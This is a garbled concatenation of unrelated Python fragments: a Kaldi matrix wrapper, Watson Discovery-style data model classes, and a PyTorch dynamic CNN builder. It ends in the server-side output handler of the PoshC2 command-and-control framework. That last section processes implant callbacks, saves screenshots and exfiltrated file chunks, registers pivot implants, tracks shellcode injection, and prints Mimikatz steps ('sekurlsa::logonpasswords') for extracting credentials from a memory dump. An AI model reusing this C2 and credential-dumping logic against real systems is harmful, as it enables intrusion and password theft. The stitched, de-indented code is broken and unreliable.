s = Vector(n)
if destructive:
self._destructive_svd_(s, U, Vt)
else:
self._svd(s, U, Vt)
return s, U, Vt
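    # Usage sketch (names are assumptions): for a matrix ``m`` with
    # num_rows >= num_cols,
    #
    #   s, U, Vt = m.svd()
    #
    # the singular values in ``s`` are unsorted; see ``sort_svd`` as noted above.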
def singular_values(self):
"""Computes singular values.
Returns:
Vector: The vector of singular values.
"""
res = Vector(self.num_cols)
self._singular_values(res)
return res
def add_mat_(self, alpha, M,
trans=_matrix_common.MatrixTransposeType.NO_TRANS):
"""Adds another matrix to this one.
Performs the operation :math:`S = \\alpha\\ M + S`.
Args:
alpha (float): The scalar multiplier.
M (Matrix or SpMatrix or DoubleSpMatrix): The input matrix.
trans (MatrixTransposeType): Whether to use **M** or its transpose.
Defaults to ``MatrixTransposeType.NO_TRANS``.
Raises:
RuntimeError: In case of size mismatch.
"""
if isinstance(M, _kaldi_matrix.MatrixBase):
self._add_mat_(alpha, M, trans)
elif isinstance(M, _sp_matrix.SpMatrix):
_kaldi_matrix_ext.add_sp(self, alpha, M)
elif isinstance(M, _sp_matrix.DoubleSpMatrix):
_kaldi_matrix_ext.add_double_sp(self, alpha, M)
else:
raise TypeError("input matrix type is not supported.")
return self
def add_mat_mat_(self, A, B,
transA=_matrix_common.MatrixTransposeType.NO_TRANS,
transB=_matrix_common.MatrixTransposeType.NO_TRANS,
alpha=1.0, beta=1.0, sparseA=False, sparseB=False):
"""Adds the product of given matrices.
Performs the operation :math:`M = \\alpha\\ A\\ B + \\beta\\ M`.
Args:
A (Matrix or TpMatrix or SpMatrix):
args['use_passage'] = _dict.get('use_passage')
if 'field' in _dict:
args['field'] = _dict.get('field')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ComponentSettingsFieldsShownBody object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'use_passage') and self.use_passage is not None:
_dict['use_passage'] = self.use_passage
if hasattr(self, 'field') and self.field is not None:
_dict['field'] = self.field
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ComponentSettingsFieldsShownBody object."""
return json.dumps(self._to_dict(), indent=2)
def __eq__(self, other: 'ComponentSettingsFieldsShownBody') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ComponentSettingsFieldsShownBody') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ComponentSettingsFieldsShownTitle():
"""
Title label.
:attr str field: (optional) Use a specific field as the title.
"""
def __init__(self, *, field: str = None) -> None:
"""
Initialize a ComponentSettingsFieldsShownTitle object.
:param str field: (optional) Use a specific field as the title.
"""
self.field = field
@classmethod
def from_dict(cls, _dict: Dict) -> 'ComponentSettingsFieldsShownTitle':
"""Initialize a ComponentSettingsFieldsShownTitle object from a json dictionary."""
args = {}
valid_keys = ['field']
bad_keys = set(_dict.keys()) - set(valid_keys)
if bad_keys:
raise ValueError(
'Unrecognized keys detected in dictionary for class ComponentSettingsFieldsShownTitle: '
+ ', '.join(bad_keys))
if 'field' in _dict:
args['field'] = _dict.get('field')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ComponentSettingsFieldsShownTitle object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'field') and self.field is not None:
_dict['field'] = self.field
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ComponentSettingsFieldsShownTitle object."""
return json.dumps(self._to_dict(), indent=2)
def __eq__(self, other: 'ComponentSettingsFieldsShownTitle') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ComponentSettingsFieldsShownTitle') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
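# Hedged round-trip example (the field value is made up):
#
#   title = ComponentSettingsFieldsShownTitle.from_dict({'field': 'title'})
#   assert title.to_dict() == {'field': 'title'}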
class ComponentSettingsResponse():
"""
A response containing the default component settings.
:attr ComponentSettingsFieldsShown fields_shown: (optional) Fields shown in the
results section of the UI.
:attr bool autocomplete: (optional) Whether or not autocomplete is enabled.
:attr bool structured_search: (optional) Whether or not structured search is
enabled.
:attr int results_per_page: (optional) Number or results shown per page.
:attr List[ComponentSettingsAggregation] aggregations: (optional) a list of
component setting aggregations.
"""
def __init__(
self,
*,
fields_shown: 'ComponentSettingsFieldsShown' = None,
autocomplete: bool = None,
structured_search: bool = None,
results_per_page: int = None,
aggregations: List['ComponentSettingsAggregation'] = None) -> None:
"""
Initialize a ComponentSettingsResponse object.
:param ComponentSettingsFieldsShown fields_shown: (optional) Fields shown
in the results section of the UI.
:param bool autocomplete: (optional) Whether or not autocomplete is
enabled.
:param bool structured_search: (optional) Whether or not structured search
is enabled.
:param int results_per_page: (optional) Number or results shown per page.
:param List[ComponentSettingsAggregation] aggregations: (optional) a list
of component setting aggregations.
"""
self.fields_shown = fields_shown
self.autocomplete = autocomplete
self.structured_search = structured_search
self.results_per_page = results_per_page
self.aggregations = aggregations
@classmethod
def from_dict(cls, _dict: Dict) -> 'ComponentSettingsResponse':
"""Initialize a ComponentSettingsResponse object from a json dictionary."""
args = {}
valid_keys = [
'fields_shown', 'autocomplete', 'structured_search',
'results_per_page', 'aggregations'
]
bad_keys = set(_dict.keys()) - set(valid_keys)
if bad_keys:
raise ValueError(
'Unrecognized keys detected in dictionary for class ComponentSettingsResponse: '
+ ', '.join(bad_keys))
if 'fields_shown' in _dict:
args['fields_shown'] = ComponentSettingsFieldsShown._from_dict(
_dict.get('fields_shown'))
if 'autocomplete' in _dict:
args['autocomplete'] = _dict.get('autocomplete')
if 'structured_search' in _dict:
args['structured_search'] = _dict.get('structured_search')
if 'results_per_page' in _dict:
args['results_per_page'] = _dict.get('results_per_page')
if 'aggregations' in _dict:
args['aggregations'] = [
ComponentSettingsAggregation._from_dict(x)
for x in (_dict.get('aggregations'))
]
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ComponentSettingsResponse object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'fields_shown') and self.fields_shown is not None:
_dict['fields_shown'] = self.fields_shown._to_dict()
if hasattr(self, 'autocomplete') and self.autocomplete is not None:
_dict['autocomplete'] = self.autocomplete
if hasattr(self,
'structured_search') and self.structured_search is not None:
_dict['structured_search'] = self.structured_search
if hasattr(self,
'results_per_page') and self.results_per_page is not None:
_dict['results_per_page'] = self.results_per_page
if hasattr(self, 'aggregations') and self.aggregations is not None:
_dict['aggregations'] = [x._to_dict() for x in self.aggregations]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ComponentSettingsResponse object."""
return json.dumps(self._to_dict(), indent=2)
def __eq__(self, other: 'ComponentSettingsResponse') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ComponentSettingsResponse') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class DeleteDocumentResponse():
"""
Information returned when a document is deleted.
:attr str document_id: (optional) The unique identifier of the document.
:attr str status: (optional) Status of the document. A deleted document has the
status deleted.
"""
def __init__(self, *, document_id: str = None, status: str = None) -> None:
"""
Initialize a DeleteDocumentResponse object.
:param str document_id: (optional) The unique identifier of the document.
:param str status: (optional) Status of the document. A deleted document
has the status deleted.
"""
self.document_id = document_id
self.status = status
@classmethod
def from_dict(cls, _dict: Dict) -> 'DeleteDocumentResponse':
"""Initialize a DeleteDocumentResponse object from a json dictionary."""
args = {}
valid_keys = ['document_id', 'status']
bad_keys = set(_dict.keys()) - set(valid_keys)
if bad_keys:
raise ValueError(
'Unrecognized keys detected in dictionary for class DeleteDocumentResponse: '
+ ', '.join(bad_keys))
if 'document_id' in _dict:
args['document_id'] = _dict.get('document_id')
if 'status' in _dict:
args['status'] = _dict.get('status')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a DeleteDocumentResponse object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'document_id') and self.document_id is not None:
_dict['document_id'] = self.document_id
if hasattr(self, 'status') and self.status is not None:
_dict['status'] = self.status
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this DeleteDocumentResponse object."""
return json.dumps(self._to_dict(), indent=2)
def __eq__(self, other: 'DeleteDocumentResponse') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'DeleteDocumentResponse') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class StatusEnum(Enum):
"""
Status of the document. A deleted document has the status deleted.
"""
DELETED = "deleted"
class DocumentAccepted():
"""
Information returned after an uploaded document is accepted.
:attr str document_id: (optional) The unique identifier of the ingested
document.
:attr str status: (optional) Status of the document in the ingestion process. A
status of `processing` is returned for documents that are ingested with a
*version* date before `2019-01-01`. The `pending` status is returned for all
others.
"""
def __init__(self, *, document_id: str = None, status: str = None) -> None:
"""
Initialize a DocumentAccepted object.
:param str document_id: (optional) The unique identifier of the ingested
document.
:param str status: (optional) Status of the document in the ingestion
process. A status of `processing` is returned for documents that are
ingested with a *version* date before `2019-01-01`. The `pending` status is
returned for all others.
"""
self.document_id = document_id
self.status = status
@classmethod
def from_dict(cls, _dict: Dict) -> 'DocumentAccepted':
"""Initialize a DocumentAccepted object from a json dictionary."""
args = {}
valid_keys = ['document_id', 'status']
bad_keys = set(_dict.keys()) - set(valid_keys)
if bad_keys:
raise ValueError(
'Unrecognized keys detected in dictionary for class DocumentAccepted: '
+ ', '.join(bad_keys))
if 'document_id' in _dict:
args['document_id'] = _dict.get('document_id')
if 'status' in _dict:
args['status'] = _dict.get('status')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a DocumentAccepted object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
        if hasattr(self, 'document_id') and self.document_id is not None:
            _dict['document_id'] = self.document_id
        if hasattr(self, 'status') and self.status is not None:
            _dict['status'] = self.status
        return _dict
# -*- coding: utf-8 -*-
import torch
from torch import nn
from support_DynamicNet import getActivationList, getPoolingList, convOutputShape, convertTupleElementToInt  # convertTupleElementToInt is assumed to be provided by support_DynamicNet
import numpy as np
from tqdm import tqdm
import matplotlib.pyplot as plt
class DynamicCNN(nn.Module):
def __init__(self, parameters, print_var = False, tracking_input_dimension = False):
super().__init__()
self.print_var = print_var
self.tracking_input_dimension = tracking_input_dimension
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Parameters recovery and check
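        # Illustrative sketch of the expected dictionary (an assumption based on
        # the checks below, not a documented schema):
        #
        #   parameters = {
        #       "layers_cnn": 2,            # number of convolutional layers
        #       "layers_ff": 1,             # number of linear layers
        #       "activation_list": [...],   # length = layers_cnn + layers_ff + 1
        #       "kernel_list": [...],       # one kernel size per conv layer
        #       "filters_list": [...],      # one channel spec per conv layer
        #       "device": torch.device("cpu"),  # optional, defaults to CPU
        #   }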
# Set device for the training/execution
if("device" in parameters.keys()): self.device = parameters["device"]
else: self.device = device = torch.device("cpu")
# Set the number of layers for convolutional part
if("layers_cnn" in parameters.keys()):
layers_cnn = int(parameters["layers_cnn"]) #0
if(print_var): print("Layer CNN: {}".format(layers_cnn))
else:
layers_cnn = 0;
if(print_var): print("Layer CNN: {}".format(layers_cnn))
# raise Exception("No \"layers_cnn\" key inside the paramters dictionary")
# Set the number of layers for linear part
if("layers_ff" in parameters.keys()):
layers_ff = int(parameters["layers_ff"]) #1
if(print_var): print("Layer Linear: {}".format(layers_ff))
else:
layers_ff = 0
if(print_var): print("Layer Linear: {}".format(layers_ff))
# raise Exception("No \"layers_ff\" key inside the paramters dictionary")
if(layers_cnn == 0 and layers_ff == 0): raise Exception("Both \"layers_cnn\" and \"layers_ff\" are set to 0. You must have at least one layer.")
self.layers_cnn, self.layers_ff = layers_cnn, layers_ff
# Set activation functions for each layer
act = getActivationList()
if("activation_list" in parameters.keys()):
activation_list = parameters["activation_list"]
# Check activation list length (N.B the +1 is added because there is the flatten layer between the cnn and the feed-forward part)
if(len(activation_list) != layers_cnn + layers_ff + 1): raise Exception("wrong number of elements in activation_list")
# Create the activation list of the two part of the network
activation_list_cnn = activation_list[0:layers_cnn]
activation_list_ff = activation_list[(layers_cnn + 1):]
activation_flatten = activation_list[layers_cnn]
if(print_var): print("Activation CNN: {}\nActivation Linear: {}\nActivation Flatten: {}".format(activation_list_cnn, activation_list_ff, activation_flatten))
else:
raise Exception("No \"activation_list\" key inside the paramters dictionary")
if(layers_cnn != 0):
# Set kernel list
if("kernel_list" in parameters.keys() and layers_cnn != 0):
kernel_list = convertTupleElementToInt(parameters["kernel_list"])
# Check kernel list length
if(len(kernel_list) != layers_cnn): raise Exception("Wrong number of elements in kernel_list")
if(print_var): print("Kernels: {}".format(kernel_list))
            else:
                # kernel_list is required by the construction loop below and has no
                # sensible default, so a missing key is treated as an error here.
                raise Exception("No \"kernel_list\" key inside the parameters dictionary")
# Set filter list
if("filters_list" in parameters.keys() and layers_cnn != 0):
filters_list = convertTupleElementToInt(parameters["filters_list"])
# Check filter list length
if(len(filters_list) != layers_cnn): raise Exception("Wrong number of elements in filters_list")
if(print_var): print("Filters/Channels: {}".format(filters_list))
else:
raise Exception("No \"filters_list\" key inside the paramters dictionary")
# Set stride list
if("stride_list" in parameters.keys() and layers_cnn != 0):
stride_list = convertTupleElementToInt(parameters["stride_list"])
# Check stride list length
if(len(stride_list) != layers_cnn): raise Exception("Wrong number of elements in stride_list")
if(print_var): print("Stride List: {}".format(stride_list))
else:
                # If no stride is provided, create a vector setting every stride to the Conv2d default of 1
stride_list = np.ones(layers_cnn).astype(int)
if(print_var): print("Stride List: {}".format(stride_list))
# Set padding list
if("padding_list" in parameters.keys() and layers_cnn != 0):
padding_list = convertTupleElementToInt(parameters["padding_list"])
# Check padding list length
if(len(padding_list) != layers_cnn): raise Exception("Wrong number of elements in padding_list")
if(print_var): print("Padding List: {}".format(padding_list))
else:
                # If no padding is provided, create a vector setting every pad to the Conv2d default of 0
padding_list = np.zeros(layers_cnn).astype(int)
if(print_var): print("Padding List: {}".format(padding_list))
# Set pooling list
if("pooling_list" in parameters.keys() and layers_cnn != 0):
pooling_list = parameters["pooling_list"]
# Check pooling length
if(len(pooling_list) != layers_cnn): raise Exception("Wrong number of elements in pooling_list")
if(print_var): print("Pooling List: {}".format(pooling_list))
else:
                # If no pooling is provided, create a vector of negative numbers so no pooling layer is added
pooling_list = np.ones(layers_cnn).astype(int) * -1
if(print_var): print("Pooling List: {}".format(pooling_list))
# Set groups list
if("groups_list" in parameters.keys() and layers_cnn != 0):
groups_list = parameters["groups_list"]
# Check group length
if(len(groups_list) != layers_cnn): raise Exception("Wrong number of elements in group_list")
if(print_var): print("Groups List: {}".format(groups_list))
else:
                # If no groups are provided, create a vector of ones so groups is set to the Conv2d default of 1
groups_list = np.ones(layers_cnn).astype(int)
if(print_var): print("Groups List: {}".format(groups_list))
# Set Batch Normalization list
if("CNN_normalization_list" in parameters.keys() and layers_cnn != 0):
CNN_normalization_list = parameters["CNN_normalization_list"]
# Check batch_normalization_list list length
if(len(CNN_normalization_list) != layers_cnn): raise Exception("Wrong number of elements in CNN_normalization_list")
if(print_var): print("CNN Normalization: {}".format(CNN_normalization_list))
else:
                # If no normalization list is provided, build an all-False vector so no normalization layer is added
CNN_normalization_list = np.ones(layers_cnn).astype(int) * -1
CNN_normalization_list = CNN_normalization_list > 100
if(print_var): print("CNN Normalization: {}".format(CNN_normalization_list))
# Set dropout list
if("dropout_list" in parameters.keys()):
dropout_list = parameters["dropout_list"]
# Check dropout list length
if(len(dropout_list) != layers_cnn + layers_ff + 1): raise Exception("Wrong number of elements in dropout_list")
dropout_list_cnn = dropout_list[0:layers_cnn]
dropout_list_ff = dropout_list[(layers_cnn + 1):]
dropout_flatten = dropout_list[layers_cnn]
if(print_var): print("Dropout List: {}".format(dropout_list))
else:
            # If no dropout list is provided, create a vector of negative numbers so no dropout layer is added
dropout_list = np.ones(layers_cnn + layers_ff + 1).astype(int) * -1
dropout_list_cnn = dropout_list[0:layers_cnn]
dropout_list_ff = dropout_list[(layers_cnn + 1):]
dropout_flatten = dropout_list[layers_cnn]
if(print_var): print("Dropout List: {}".format(dropout_list))
# Set bias list
if("bias_list" in parameters.keys()):
bias_list = parameters["bias_list"]
# Check bias list length
if(len(bias_list) != layers_cnn + layers_ff + 1): raise Exception("Wrong number of elements in bias_list")
bias_list_cnn = bias_list[0:layers_cnn]
bias_list_ff = bias_list[(layers_cnn + 1):]
bias_list_flatten = bias_list[layers_cnn]
if(print_var): print("Bias List: {}".format(bias_list))
else:
            # If no bias list is provided, build an all-True vector so every layer keeps the default of bias=True
bias_list = np.ones(layers_cnn + layers_ff + 1).astype(int) * -1
bias_list = bias_list < 1000
bias_list_cnn = bias_list[0:layers_cnn]
bias_list_ff = bias_list[(layers_cnn + 1):]
bias_list_flatten = bias_list[layers_cnn]
if(print_var): print("Bias List: {}".format(bias_list))
# Set neuron list
if("neurons_list" in parameters.keys()):
neurons_list = parameters["neurons_list"]
# Check activation list length
if(len(neurons_list) != layers_ff): raise Exception("Wrong number of elements in neurons_list")
if(layers_ff != 1): neurons_list = convertArrayInTupleList(neurons_list)
if(print_var): print("Neurons List: {}".format(neurons_list))
else:
# raise Exception("No \"Neurons_list\" key inside the paramters dictionary")
neurons_list = []
if(print_var): print("Neurons List: {}".format(neurons_list))
# Add a empty line
if(print_var): print()
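        # --- Illustrative sketch (assumption, not taken verbatim from the original code):
        # a minimal parameters dictionary for a 2-conv / 1-linear network. Only the key
        # names and the length checks above are grounded in this file; the concrete value
        # types (e.g. whether activation entries index into getActivationList()) are guesses.
        # example_parameters = {
        #     "h": 64, "w": 64,                    # input height and width (used below)
        #     "layers_cnn": 2, "layers_ff": 1,
        #     "activation_list": [0, 0, 0, 1],     # layers_cnn + layers_ff + 1 entries
        #     "kernel_list": [(3, 3), (3, 3)],     # one kernel size per conv layer
        #     "filters_list": [(1, 8), (8, 16)],   # (in_channels, out_channels) per conv layer
        #     "neurons_list": [10],                # layers_ff entries for the linear part
        # }
        # All remaining lists (stride, padding, pooling, groups, normalization, dropout,
        # bias) fall back to the defaults constructed above when their keys are absent.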
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# CNN Construction
# Temporary variable used to track the change in dimensions of the input
if(layers_cnn != 0):
tmp_input = torch.ones((1, filters_list[0][0], parameters["h"], parameters["w"]))
if(tracking_input_dimension):
print("# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ")
print(tmp_input.shape, "\n")
            # Temporary list to store the layers
tmp_list = []
# Construction cycle
for kernel, n_filter, stride, padding, pool, activation, normalization, p_dropout, groups, bias in zip(kernel_list, filters_list, stride_list, padding_list, pooling_list, activation_list_cnn, CNN_normalization_list, dropout_list_cnn, groups_list, bias_list_cnn):
# Create the convolutional layer and add to the list
if(groups == 1): tmp_cnn_layer = nn.Conv2d(in_channels = int(n_filter[0]), out_channels = int(n_filter[1]), kernel_size = kernel, stride = stride, padding = padding, bias = bias)
else: tmp_cnn_layer = nn.Conv2d(in_channels = int(n_filter[0]), out_channels = int(n_filter[1]), kernel_size = kernel, stride = stride, padding = padding, groups = groups, bias = bias)
tmp_list.append(tmp_cnn_layer)
# Keep track of the | |
import datetime, hashlib, base64, traceback, os, re
import poshc2.server.database.DB as DB
from poshc2.Colours import Colours
from poshc2.server.Config import ModulesDirectory, DownloadsDirectory, ReportsDirectory
from poshc2.server.Implant import Implant
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import translate_power_status
from poshc2.Utils import randomuri
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
now = datetime.datetime.now()
all_implants = DB.get_implants_all()
if not all_implants:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for implant in all_implants:
implantID = implant.ImplantID
RandomURI = implant.RandomURI
Hostname = implant.Hostname
encKey = implant.Key
Domain = implant.Domain
User = implant.User
implant_type = implant.Pivot
if RandomURI in uriPath and cookieVal:
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
if implant_type == "JXA":
rawoutput = decrypt(encKey, post_data[1500:])
else:
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
cookieMsg = ""
if "-" in decCookie:
decCookie = decCookie.strip('\x00')
splt = decCookie.split("-")
if not splt[0].isdigit():
print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN)
return
else:
taskId = str(int(splt[0]))
cookieMsg = splt[1]
else:
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if taskId != "99999":
executedCmd = DB.get_cmd_from_task_id(taskId)
task_owner = DB.get_task_owner(taskId)
else:
print(Colours.END)
timenow = now.strftime("%Y-%m-%d %H:%M:%S")
print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory)
print(Colours.GREEN)
print(rawoutput)
                with open("%sbackground-data.txt" % ReportsDirectory, "a+") as miscData:
                    miscData.write(rawoutput)
return
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if cookieMsg is not None and cookieMsg.lower().startswith("pwrstatusmsg"):
translate_power_status(outputParsed, RandomURI)
return
if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
print("Module loaded successfully")
DB.update_task(taskId, "Module loaded successfully")
elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
outputParsed = re.search("PBind-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
PivotString = "C# PBind"
if "pbind-command run-exe PBind PBind start" in executedCmd:
PivotString = "C# PBind Pivot"
newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
if "pbind-command run-exe PBind PBind start" in executedCmd:
DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
else:
DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
outputParsed = re.search("FComm-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif executedCmd.lower().startswith("beacon "):
new_sleep = executedCmd.replace('beacon ', '').strip()
DB.update_sleep(new_sleep, RandomURI)
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = implant.User + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
DB.update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
DB.update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
DB.update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
DB.update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
DB.update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
DB.update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
DB.update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
message = message + "\nOr to just decode on Linux:"
message = message + f"\n base64 -id {dumpname} > dump.bin"
DB.update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
DB.update_task(taskId, outputParsed)
process_mimikatz(outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
DB.update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
def newTask(path):
all_implants = DB.get_implants_all()
commands = ""
if all_implants:
for i in all_implants:
RandomURI = i.RandomURI
Pivot = i.Pivot
EncKey = i.Key
tasks = DB.get_newtasks(RandomURI)
